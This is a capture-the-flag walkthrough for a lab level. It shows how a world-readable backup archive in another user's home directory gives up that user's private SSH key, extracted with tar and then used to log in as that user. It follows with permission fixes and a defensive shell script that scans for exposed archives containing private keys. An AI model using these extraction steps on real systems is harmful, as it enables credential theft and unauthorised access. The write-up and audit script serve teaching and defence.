- Default permit! A backup that is world-readable.
A look into /home/flag05 reveals a backup directory that is world-readable.
Inside that directory is a backup file that is also world-readable:
ls -lah /home/flag05/.backup
We can view the contents of the file with:
tar -vztf /home/flag05/.backup/backup-19072011.tgz
This reveals that there is a private key inside that archive. Our aim: extract the key and log in as flag05 with it. Do that by:
tar -Oxzf /home/flag05/.backup/backup-19072011.tgz .ssh/id_rsa > /home/level05/id_rsa
chmod 0600 /home/level05/id_rsa
ssh -i id_rsa flag05@localhost
Logged in as user flag05 we can execute
Lesson / How to fix
- Use restrictive permissions! Protect your backups as well as your data!
chmod 0700 /home/flag05/.backup
chmod 0600 /home/flag05/.backup/backup-19072011.tgz
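
To find this class of mistake before someone else does, the check below walks a directory tree, picks out tar archives whose "other" read bit is set, and reports every member that starts with a PEM private-key header. It is an added example, not part of the original walkthrough; the function name audit_backups is hypothetical, and it assumes a tar that auto-detects compression when reading (GNU tar and bsdtar do).

```shell
#!/bin/sh
# Added example: report world-readable tar archives that contain private keys.

# audit_backups ROOT
# Prints one line per finding in the form "<archive>: <member>".
# find tests the mode bits only. Run it as an unprivileged account to list
# what other users can actually reach; run as root it also reports archives
# that sit behind a restrictive parent directory.
audit_backups() {
    root=$1
    # -perm -004 matches files with the "other" read bit set.
    find "$root" -type f \
         \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) \
         -perm -004 2>/dev/null |
    while IFS= read -r archive; do
        # List members, then inspect the first line of each regular member.
        tar -tf "$archive" 2>/dev/null |
        while IFS= read -r member; do
            case $member in
                */) continue ;;   # directory entry, nothing to inspect
            esac
            # Match on content, not file name, so renamed keys are caught too.
            if tar -xOf "$archive" "$member" 2>/dev/null | head -n 1 |
               grep -q -e '-----BEGIN .*PRIVATE KEY-----'; then
                printf '%s: %s\n' "$archive" "$member"
            fi
        done
    done
}

# Stand-alone use: sh audit_backups.sh /home
if [ "$#" -gt 0 ]; then
    audit_backups "$1"
fi
```

Any line it prints names an archive that needs the chmod treatment shown above, and a key that should be treated as exposed and replaced.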